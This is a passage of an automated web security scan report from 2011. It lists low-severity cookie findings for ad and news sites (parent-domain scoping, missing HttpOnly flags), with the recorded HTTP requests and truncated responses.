Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.68. http://www.tinbuadserv.com/v3/serve.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinbuadserv.com
Path:   /v3/serve.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v3/serve.php?m=horoscope&c=0&rd=793&l=en&u=http%3A//www.fox8live.com/entertainment/horoscopes/default.aspx&r=http%3A//www.fox8live.com/content/aboutus/default.aspx HTTP/1.1
Host: www.tinbuadserv.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/entertainment/horoscopes/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:40 GMT
Server: Apache
P3P: policyref="http://www.tinbuadserv.com/v3/privacy/p3p.xml", CP="NOI NID DSP COR DEV PSA PSD IVA IVD OTP OUR OTR IND DEM PRE OTC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tbcsrv3=kaBll62z16dkaZuQlaLVqtXYqtDOoZ%2BDqaZqmG2E2KaGqKZymKhVk9Wo0Oeq3Y9uq5ugbVK7hoSuq56hbVrE16epiG7VrW6ej3eZzdqUo4hu1a1tno%2BmrMLimFKhppylcobBi1qc4W1loFXP2KzW3FVz1KhmaohplKZan%2BBta5uQrZnWVZ3mcpmnVW%2BWoGNniG7VrWyej5Sqxs9Va9ltla1alp5nWpzhbWOgVc7UrIaopnKYqFVjmGGZq2qZj26rm6FtUtKi0JVz16drcoObbGaUa5Sjb4aopnKaqFWT1aDS1Kbd1pdanOFtYZlthNakyc6lm8nPoZ7Ln9WVc9enbHKD4aiSyqLP1KHSj26rm55tUohu1a1uno%2BXp87PnJ6IbtWtaZanVZ7Q5mucz6nHoZvT2lVz1Khpaoig0det0NJVc9SobGqIm9Hlp9fQoqjGkG6joGaclZnI4FVz1KhkaohjhK6rnqVtWsPPlpvbo8XiWp%2FgbWqbkIiDiG7VrWmXp1We0OCWldii1tSszdyhWpzhbWCgVYSuq56mbVrU05SiyZvE1KqGqKZykahVUqGmnKpyhtyjrMrdoaOIbtWtaJ6PVXPUqGpqiKDR16TF25panOFtYqBVx%2BFan%2BBta5uQnKPTVZ3mcpSnVVqc4W1ioFXS6Vqf1m1pnOFtZKBVxdSs149uq5uebVKIbtWtbZ6Ppq3D15dSoaacpm6ej5akxs%2Blk86U0OGd0OBhntDma5zPqcehm9PaYaDQ4KKjyaLS2Fqf4G1wm5CmpcicxuGt0Y9uq5ufZGqIZJKjaJSdY3Gap2ZSoaacq3KG3KOsyt2hkdJVneZylKdVWpzr; path=/; domain=.tinbuadserv.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript; charset=UTF-8
Content-Length: 584

tinbuAdServer.setArrayCookie("tbv3ads","browserlang|en","country|US","city|Dallas","state|TX","metro|623","zip|75207","area|214","lat|32.7825","lon|-96.8207","companyid|clearchannels","subdomain|","do
...[SNIP]...

11. Cookie without HttpOnly flag set
There are 123 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
11.1. http://ads.adxpose.com/ads/ads.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289669 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=40370B55097864C515B0CFFAAF826F53; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:35:19 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

11.2. http://beacon-1.newrelic.com/1/fffa2293e6

Summary

Severity:   Low
Confidence:   Firm
Host:   http://beacon-1.newrelic.com
Path:   /1/fffa2293e6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/fffa2293e6?a=80779&be=3261&dc=4901&fe=6553&qt=15&ap=639&to=JQkPEEYOCQ8GQ0oFXwVJSQtACQARSg%3D%3D&v=4 HTTP/1.1
Host: beacon-1.newrelic.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Server: NewRelic
Date: Mon, 09 May 2011 15:35:53 GMT
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: JSESSIONID=36tpjk7k23ke15sjosx24zldg;Path=/
Expires: Thu, 01-Jan-1970 00:00:00 GMT


11.3. http://event.adxpose.com/event.flow

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=172249&iad=1304955321345-89810743578709660&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3BA3B870213B0BC2343870AF21CD1B45; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 09 May 2011 15:35:21 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669");

11.4. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ECB3DBA48FEF66EDAE9A7E846E561B69; Path=/
Content-Type: text/javascript
Content-Length: 8015
Date: Mon, 09 May 2011 15:39:50 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=2
...[SNIP]...

11.5. http://shop.npr.org/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shop.npr.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=topnav&utm_medium=topnav&utm_campaign=topnav HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/story/story.php?storyId=136128917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:49 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=3asomka8201jdf038aopdaio11; expires=Tue, 10-May-2011 01:39:49 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25071

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

11.6. https://shop.npr.org/index.php

Summary

Severity:   Low
Confidence:   Firm
Host:   https://shop.npr.org
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?pcsid=dd4agnd4un1d3jrdith74nh772&p=one_page_checkout&start=1 HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Referer: http://shop.npr.org/index.php?p=cart
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:43:58 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; expires=Tue, 10-May-2011 01:43:58 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 65651

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

11.7. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850974&migRandom=106464174&migTagDesc=Cingular&migAtlSA=286737327&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:02 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 15:39:02 GMT; domain=.mookie1.com
Set-Cookie: session=1304955542|1304955542; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

11.8. http://trc.taboolasyndication.com/usatoday/trc/2/json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/trc/2/json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usatoday/trc/2/json?list-id=rbox-t2v&id=746&list-size=3&uim=rbox-t2v&intent=u&uip=rbox-t2v&item-id=46732364&item-type=text&item-url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&page-id=3aaa656500e8a4b6125b0c5e5138f55323e20348&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989&uid=d80f7856-eeab-487a-988c-f15ce2ff8eb0&cv=4-6-12-44791-2054596&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304954989; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415;Path=/usatoday/
Set-Cookie: taboola_wv=;Path=/usatoday/;Expires=Tue, 08-May-12 15:36:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 3450

trc_json_response =
{"trc":{"req":"35eb06aeafeca714ebec05bbb325c74c","session-id":"923a143436baa4e0bd9cd36ac2e2bd5f","session-data":"v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2f
...[SNIP]...

11.9. http://widgets.macroaxis.com/widgets/content.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://widgets.macroaxis.com
Path:   /widgets/content.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widgets/content.jsp?t=26&f=f&url=http%3A//www.hnedata.net/features/tr_stock_charts HTTP/1.1
Host: widgets.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:46 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=4DCCBC38AE7AB60DE732C89671BAF0FB; Path=/
Content-Length: 47
Content-Type: text/html;charset=ISO-8859-1


MyXssMagic.serverResponse(['1']);

11.10. http://www.macroaxis.com/widgets/url.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=189FB444592D30A261C6DE609DF507AC; Path=/
Content-Length: 2449
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...

11.11. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

11.12. http://a1.interclick.com/ColDta.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /ColDta.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265; ucap=sl=1; FC_51=128531=17622395:1; IFC=n=1&w50020=1&a128531=1&e=634406242967180244; Aqprep_Banner300X250=128531=634405378967210244:50020; Li=1=734265&30=734245; tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993&i100=&i90=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993; domain=.interclick.com; expires=Wed, 08-Jun-2011 15:38:40 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:39 GMT

GIF89a.............!.......,...........D..;

11.13. http://a1.interclick.com/getInPageJSProcess.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /getInPageJSProcess.aspx?a=51&b=50020&cid=633862074462683028&isif=f&rurld=www.csmonitor.com&sl=true&dvp=http%3A//www.csmonitor.com/Business&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
